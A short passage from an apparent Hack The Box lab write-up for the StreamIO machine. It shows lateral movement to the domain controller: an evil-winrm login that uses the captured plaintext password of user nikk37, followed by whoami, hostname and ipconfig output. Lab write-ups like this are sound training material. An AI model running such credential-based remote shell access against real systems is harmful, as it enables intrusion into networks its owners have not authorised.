nikk37
Using the credential of the nikk37 user, I can connect directly to the target system via WinRM
┌──(kali㉿kali)-[~/archive/htb/labs/streamio]
└─$ evil-winrm -i dc.streamio.htb -u nikk37 -p 'get_dem_girls2@yahoo.com'
Evil-WinRM shell v3.5
warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
info: Establishing connection to remote endpoint
*evil-winrm* ps c:\Users\nikk37\Documents> whoami
streamio\nikk37
*evil-winrm* ps c:\Users\nikk37\Documents> hostname
DC
*evil-winrm* ps c:\Users\nikk37\Documents> ipconfig
Windows IP Configuration
ethernet adapter ethernet0 2:
connection-specific dns suffix . : htb
ipv6 address. . . . . . . . . . . : dead:beef::243
ipv6 address. . . . . . . . . . . : dead:beef::59b8:1082:6853:8e9
link-local ipv6 address . . . . . : fe80::59b8:1082:6853:8e9%12
ipv4 address. . . . . . . . . . . : 10.10.11.158
subnet mask . . . . . . . . . . . : 255.255.255.0
default gateway . . . . . . . . . : fe80::250:56ff:feb9:d784%12
10.10.10.2Lateral Movement made to the nikk37 user via WinRM